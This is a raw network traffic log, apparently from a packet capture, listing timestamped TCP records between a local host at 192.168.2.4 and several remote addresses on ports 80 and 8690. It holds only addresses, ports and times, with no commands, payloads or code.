                                                                                              Jan 14, 2025 06:13:20.854701042 CET8049738172.245.123.7192.168.2.4
                                                                                              Jan 14, 2025 06:13:20.854739904 CET4973880192.168.2.4172.245.123.7
                                                                                              Jan 14, 2025 06:13:20.854739904 CET4973880192.168.2.4172.245.123.7
                                                                                              Jan 14, 2025 06:13:20.854743958 CET8049738172.245.123.7192.168.2.4
                                                                                              Jan 14, 2025 06:13:20.854779959 CET8049738172.245.123.7192.168.2.4
                                                                                              Jan 14, 2025 06:13:20.854784012 CET4973880192.168.2.4172.245.123.7
                                                                                              Jan 14, 2025 06:13:20.854813099 CET8049738172.245.123.7192.168.2.4
                                                                                              Jan 14, 2025 06:13:20.854846954 CET8049738172.245.123.7192.168.2.4
                                                                                              Jan 14, 2025 06:13:20.854855061 CET4973880192.168.2.4172.245.123.7
                                                                                              Jan 14, 2025 06:13:20.854876995 CET8049738172.245.123.7192.168.2.4
                                                                                              Jan 14, 2025 06:13:20.854893923 CET4973880192.168.2.4172.245.123.7
                                                                                              Jan 14, 2025 06:13:20.854911089 CET8049738172.245.123.7192.168.2.4
                                                                                              Jan 14, 2025 06:13:20.854944944 CET8049738172.245.123.7192.168.2.4
                                                                                              Jan 14, 2025 06:13:20.854953051 CET4973880192.168.2.4172.245.123.7
                                                                                              Jan 14, 2025 06:13:20.854978085 CET8049738172.245.123.7192.168.2.4
                                                                                              Jan 14, 2025 06:13:20.855011940 CET8049738172.245.123.7192.168.2.4
                                                                                              Jan 14, 2025 06:13:20.855016947 CET4973880192.168.2.4172.245.123.7
                                                                                              Jan 14, 2025 06:13:20.855045080 CET8049738172.245.123.7192.168.2.4
                                                                                              Jan 14, 2025 06:13:20.855078936 CET8049738172.245.123.7192.168.2.4
                                                                                              Jan 14, 2025 06:13:20.855119944 CET4973880192.168.2.4172.245.123.7
                                                                                              Jan 14, 2025 06:13:20.855135918 CET8049738172.245.123.7192.168.2.4
                                                                                              Jan 14, 2025 06:13:20.855187893 CET8049738172.245.123.7192.168.2.4
                                                                                              Jan 14, 2025 06:13:20.855221033 CET8049738172.245.123.7192.168.2.4
                                                                                              Jan 14, 2025 06:13:20.855231047 CET4973880192.168.2.4172.245.123.7
                                                                                              Jan 14, 2025 06:13:20.855256081 CET8049738172.245.123.7192.168.2.4
                                                                                              Jan 14, 2025 06:13:20.855258942 CET4973880192.168.2.4172.245.123.7
                                                                                              Jan 14, 2025 06:13:20.855289936 CET8049738172.245.123.7192.168.2.4
                                                                                              Jan 14, 2025 06:13:20.855331898 CET4973880192.168.2.4172.245.123.7
                                                                                              Jan 14, 2025 06:13:20.855354071 CET8049738172.245.123.7192.168.2.4
                                                                                              Jan 14, 2025 06:13:20.855389118 CET8049738172.245.123.7192.168.2.4
                                                                                              Jan 14, 2025 06:13:20.855423927 CET8049738172.245.123.7192.168.2.4
                                                                                              Jan 14, 2025 06:13:20.855429888 CET4973880192.168.2.4172.245.123.7
                                                                                              Jan 14, 2025 06:13:20.855460882 CET8049738172.245.123.7192.168.2.4
                                                                                              Jan 14, 2025 06:13:20.855494976 CET8049738172.245.123.7192.168.2.4
                                                                                              Jan 14, 2025 06:13:20.855526924 CET8049738172.245.123.7192.168.2.4
                                                                                              Jan 14, 2025 06:13:20.855534077 CET4973880192.168.2.4172.245.123.7
                                                                                              Jan 14, 2025 06:13:20.855561972 CET8049738172.245.123.7192.168.2.4
                                                                                              Jan 14, 2025 06:13:20.855595112 CET8049738172.245.123.7192.168.2.4
                                                                                              Jan 14, 2025 06:13:20.855602026 CET4973880192.168.2.4172.245.123.7
                                                                                              Jan 14, 2025 06:13:20.855628967 CET8049738172.245.123.7192.168.2.4
                                                                                              Jan 14, 2025 06:13:20.855633974 CET4973880192.168.2.4172.245.123.7
                                                                                              Jan 14, 2025 06:13:20.855663061 CET8049738172.245.123.7192.168.2.4
                                                                                              Jan 14, 2025 06:13:20.855696917 CET8049738172.245.123.7192.168.2.4
                                                                                              Jan 14, 2025 06:13:20.855701923 CET4973880192.168.2.4172.245.123.7
                                                                                              Jan 14, 2025 06:13:20.855731964 CET8049738172.245.123.7192.168.2.4
                                                                                              Jan 14, 2025 06:13:20.855765104 CET8049738172.245.123.7192.168.2.4
                                                                                              Jan 14, 2025 06:13:20.855782032 CET4973880192.168.2.4172.245.123.7
                                                                                              Jan 14, 2025 06:13:20.855797052 CET8049738172.245.123.7192.168.2.4
                                                                                              Jan 14, 2025 06:13:20.855832100 CET8049738172.245.123.7192.168.2.4
                                                                                              Jan 14, 2025 06:13:20.855864048 CET8049738172.245.123.7192.168.2.4
                                                                                              Jan 14, 2025 06:13:20.855871916 CET4973880192.168.2.4172.245.123.7
                                                                                              Jan 14, 2025 06:13:20.855897903 CET8049738172.245.123.7192.168.2.4
                                                                                              Jan 14, 2025 06:13:20.855933905 CET8049738172.245.123.7192.168.2.4
                                                                                              Jan 14, 2025 06:13:20.855940104 CET4973880192.168.2.4172.245.123.7
                                                                                              Jan 14, 2025 06:13:20.855967999 CET8049738172.245.123.7192.168.2.4
                                                                                              Jan 14, 2025 06:13:20.855973005 CET4973880192.168.2.4172.245.123.7
                                                                                              Jan 14, 2025 06:13:20.856002092 CET8049738172.245.123.7192.168.2.4
                                                                                              Jan 14, 2025 06:13:20.856035948 CET8049738172.245.123.7192.168.2.4
                                                                                              Jan 14, 2025 06:13:20.856040955 CET4973880192.168.2.4172.245.123.7
                                                                                              Jan 14, 2025 06:13:20.856070042 CET8049738172.245.123.7192.168.2.4
                                                                                              Jan 14, 2025 06:13:20.856102943 CET8049738172.245.123.7192.168.2.4
                                                                                              Jan 14, 2025 06:13:20.856108904 CET4973880192.168.2.4172.245.123.7
                                                                                              Jan 14, 2025 06:13:20.856137037 CET8049738172.245.123.7192.168.2.4
                                                                                              Jan 14, 2025 06:13:20.856168985 CET8049738172.245.123.7192.168.2.4
                                                                                              Jan 14, 2025 06:13:20.856204033 CET8049738172.245.123.7192.168.2.4
                                                                                              Jan 14, 2025 06:13:20.856209040 CET4973880192.168.2.4172.245.123.7
                                                                                              Jan 14, 2025 06:13:20.857845068 CET4973880192.168.2.4172.245.123.7
                                                                                              Jan 14, 2025 06:13:20.909010887 CET497398690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:20.914246082 CET869049739172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:20.914346933 CET497398690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:20.919076920 CET497398690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:20.924103022 CET869049739172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:20.932931900 CET4973880192.168.2.4172.245.123.7
                                                                                              Jan 14, 2025 06:13:21.388329029 CET869049739172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:21.437624931 CET497398690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:21.520735979 CET869049739172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:21.525012016 CET497398690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:21.529891968 CET869049739172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:21.530775070 CET497398690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:21.535590887 CET869049739172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:21.694618940 CET869049739172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:21.697016001 CET497398690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:21.701940060 CET869049739172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:21.923367023 CET869049739172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:21.968888044 CET497398690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:21.983599901 CET4974080192.168.2.4178.237.33.50
                                                                                              Jan 14, 2025 06:13:21.988537073 CET8049740178.237.33.50192.168.2.4
                                                                                              Jan 14, 2025 06:13:21.988605976 CET4974080192.168.2.4178.237.33.50
                                                                                              Jan 14, 2025 06:13:21.988723993 CET4974080192.168.2.4178.237.33.50
                                                                                              Jan 14, 2025 06:13:21.993760109 CET8049740178.237.33.50192.168.2.4
                                                                                              Jan 14, 2025 06:13:22.056896925 CET869049739172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:22.058054924 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:22.062951088 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:22.063010931 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:22.065572023 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:22.070439100 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:22.109597921 CET497398690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:22.579000950 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:22.592828989 CET8049740178.237.33.50192.168.2.4
                                                                                              Jan 14, 2025 06:13:22.592948914 CET4974080192.168.2.4178.237.33.50
                                                                                              Jan 14, 2025 06:13:22.611743927 CET497398690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:22.616830111 CET869049739172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:22.625149012 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:22.714049101 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:22.717673063 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:22.722791910 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:22.722887039 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:22.727945089 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:22.909104109 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:22.909147978 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:22.909183025 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:22.909214020 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:22.909248114 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:22.909280062 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:22.909313917 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:22.909344912 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:22.909344912 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:22.909344912 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:22.909354925 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:22.909889936 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:22.909924030 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:22.909950972 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:22.909957886 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:22.909974098 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:22.909991980 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:22.911796093 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:22.914457083 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:22.969016075 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.001501083 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.001535892 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.001569033 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.001600981 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.001633883 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.001705885 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.001707077 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.002238035 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.002270937 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.002305031 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.002314091 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.002337933 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.002346039 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.002371073 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.002403021 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.002439022 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.002445936 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.002480030 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.002759933 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.002791882 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.002824068 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.002855062 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.002863884 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.002890110 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.002904892 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.003624916 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.003658056 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.003691912 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.003700018 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.003725052 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.003734112 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.003762007 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.004451036 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.004482985 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.004492044 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.004518986 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.004523039 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.047082901 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.094377041 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.094405890 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.094438076 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.094491005 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.094522953 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.094579935 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.094579935 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.094818115 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.094850063 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.094882965 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.094911098 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.094932079 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.094933987 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.095052004 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.095083952 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.095113039 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.095114946 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.095146894 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.095160961 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.095180035 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.095258951 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.095534086 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.095566034 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.095599890 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.095613956 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.095911980 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.095943928 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.095957994 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.095978022 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.096009970 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.096044064 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.096057892 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.096076965 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.096098900 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.096111059 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.096147060 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.096189976 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.096879959 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.096913099 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.096930027 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.096949100 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.096981049 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.097014904 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.097024918 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.097047091 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.097060919 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.097080946 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.097114086 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.097158909 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.097861052 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.097893953 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.097907066 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.097928047 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.097959995 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.097994089 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.098007917 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.098026037 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.098047018 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.098058939 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.098093033 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.098103046 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.098836899 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.098869085 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.098901987 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.098932981 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.098962069 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.098962069 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.098967075 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.098998070 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.099020004 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.099030972 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.099065065 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.099116087 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.099627018 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.099685907 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.099749088 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.140865088 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.186959982 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.187009096 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.187043905 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.187067986 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.187076092 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.187109947 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.187143087 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.187165976 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.187187910 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.187210083 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.187258959 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.187293053 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.187355995 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.187360048 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.187393904 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.187412977 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.187426090 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.187463045 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.187494040 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.187510967 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.187527895 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.187541962 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.187561035 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.187592983 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.187625885 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.187642097 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.187658072 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.187664986 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.187731028 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.187783003 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.187783957 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.187815905 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.187850952 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.187882900 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.187896013 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.187917948 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.187925100 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.187953949 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.188003063 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.188035965 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.188046932 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.188067913 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.188086033 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.188101053 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.188132048 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.188167095 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.188175917 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.188194990 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.188215017 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.188683033 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.188714981 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.188750982 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.188765049 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.188782930 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.188798904 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.188817024 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.188848019 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.188882113 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.188891888 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.188913107 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.188929081 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.188946009 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.188977957 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.189008951 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.189022064 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.189040899 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.189054012 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.189076900 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.189481020 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.189512968 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.189543009 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.189563990 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.189568996 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.189595938 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.189629078 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.189661980 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.189678907 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.189696074 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.189702988 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.189730883 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.189764023 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.189795971 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.189811945 CET497418690192.168.2.4172.245.123.12
